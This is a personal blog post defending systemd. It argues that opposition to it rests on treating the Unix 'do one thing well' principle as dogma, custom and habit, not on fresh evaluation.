I was just reading comments on a post on Hackernews about systemd. Systemd, as you might know, is a replacement for the venerable init system. Anyway, reading the comments was reading about all the same story over and over again. Namely, there are those strongly pro and those strongly con the systemd, in some cases based on arguments (valid or not) and in other cases based on feelings. In this post I won't go into technical details about systemd but I'll concentrate on a human behavior that is the most interesting to me. And yes, if you think I'm pro systemd, then you're right, I am!

Now, what I think is the key characteristic of people is that they become too religious about something and thus unable to critically evaluate that particular thing. It happened a lot of times, and in some cases the transition from controversy was short, in other cases it took several or more generations of human lives. Take as an example the Christian religion! It also started as something controversial, but ended as a dogma that isn't allowed to be questioned. Or something more technical, ISO/OSI 7 layer model. It started as a controversy - home many layers, 5, 6, or 7? The result of this controversy we know, and after some short period of time it turned into a dogma, i.e. that 7 layers is some magical number of layers that isn't to be questioned. Luckily, I don't think that it is the case any more, that is, it is clear that 7 layers was too much. Anyway, I could list such cases on and on, almost ad infinitum. Note that I don't claim that any controversial change succeeded in the end, some were abandoned and that's (probably) OK.

I should also mention one other interesting thing called customs (as in norm). People lives are intervened with customs. Anyway, we have a tendency to do something that our elders did just because, i.e. we don't know why. I don't think that's bad per se, after all, probably that helped us to survive. The problem with the customs is that they assume slow development and change in environment. In such cases they are very valuable tool to collect and pass experience from generation to generation. But, when development/change speed reaches some tipping point, customs become a problem, not an advantage - and they stall adjustment to new circumstances. So, my personal opinion about customs is that we should respect them, but never forget to analyze if they are applicable/useful or not in a certain situation.

Finally, there is one more characteristic of a human beings, and that is inertia. We used to do things in certain way, and that's hard to change. Actually, I do not think that it is unrelated to religion and customs, actually on the contrary, I think they are related and it might be something else that is behind. But i won't go into that, at least not in this post.

So, what all this has to do with the systemd? Well, there is principle or philosophy in Unix development that states that whatever you program/create in Unix, let it do one thing and let it do it right. For example, tool to search for file should do it well, but not do anything else. And my opinion is that this philosophy turned into a custom and a religion in the same time. Just go through the comments related to SystemD and read them a bit. A substantial number of arguments is based on the premise that there is a principle and it should be obeyed under any cost/circumstance. But all those who bring this argument forget to justify why this principle would be applicable in this particular scenario.

And the state of computing has drastically changed from the time when this philosophy was (supposedly) defined (i.e. 1970-ties) and today's world. Let me say just a few big differences. Machines in the time when Unix was created were multiuser and stationary, with limited resources and capabilities, and they were used for much narrower application domains than today. Today, machines are powerful and inexpensive, used primarily by a single user. They do a lot more than they used to do 40 years ago, and they offer to users a lot more. Finally, users expectations from them are much higher than they used to be.

One advantage of doing one thing and doing it well was that it reduces complexity. In a world when programming was done in C or assembler, this was very important. But it also has a drawback, and that it is that you lose ability to see above the simple things. This in turn, costs you performance but also functionality, i.e. what you can do. Take for example pipes in Unix. They are great for data stored in text organized in a records consisting of lines. But what about JSON, XML and other complex structures? In other word, being simple means you can do just a simple things.

This issue of simple and manageable and complex and more able is actually a theme that occurs in different areas, too. For example, in networking where you have layers, but because cross layer communication is restricted means you have a problems with modern networks. Or, take for example programming and organizing software in simple modules/objects. Again, the more primitive base system is, the more problems you have to achieve complex behavior - in terms of performance, complexity, and so on.

Few more things to add to the mix about Unix development. First, Unix is definitely success. But it doesn't mean that everything that Unix did is a success. There are things that are good, bad, and ugly. Nothing is perfect, nor will ever be. So, we have to keep in mind that Unix can be better. The next thing we have to keep in mind is that each one of us has a particular view on the world, a.k.a. Unix, and our view is not necessarily the right view, or the view of the majority. This fact should influence the way we express ourselves in comments. So, do not over generalize each single personal use case. Yet, there are people who's opinion is more relevant, and that are those that maintain init/systemd and similar systems, as well as those that write scripts/modules for them.

Anyway, I'll stop here. My general opinion is that we are in 21st century and we have to re-evaluate everything we think should be done (customs) and in due course not be religious about certain things.

P.S. Systemd is not a single process/binary but a set of them so it's not monolithic. Yet, some argue its a monolithic! What is a definition of "monolithic"? With that line of reasoning GNU's coreutils is a monolithic software and thus not according to the Unix philosophy!

About Me

scientist, consultant, security specialist, networking guy, system administrator, philosopher ;)

Blog Archive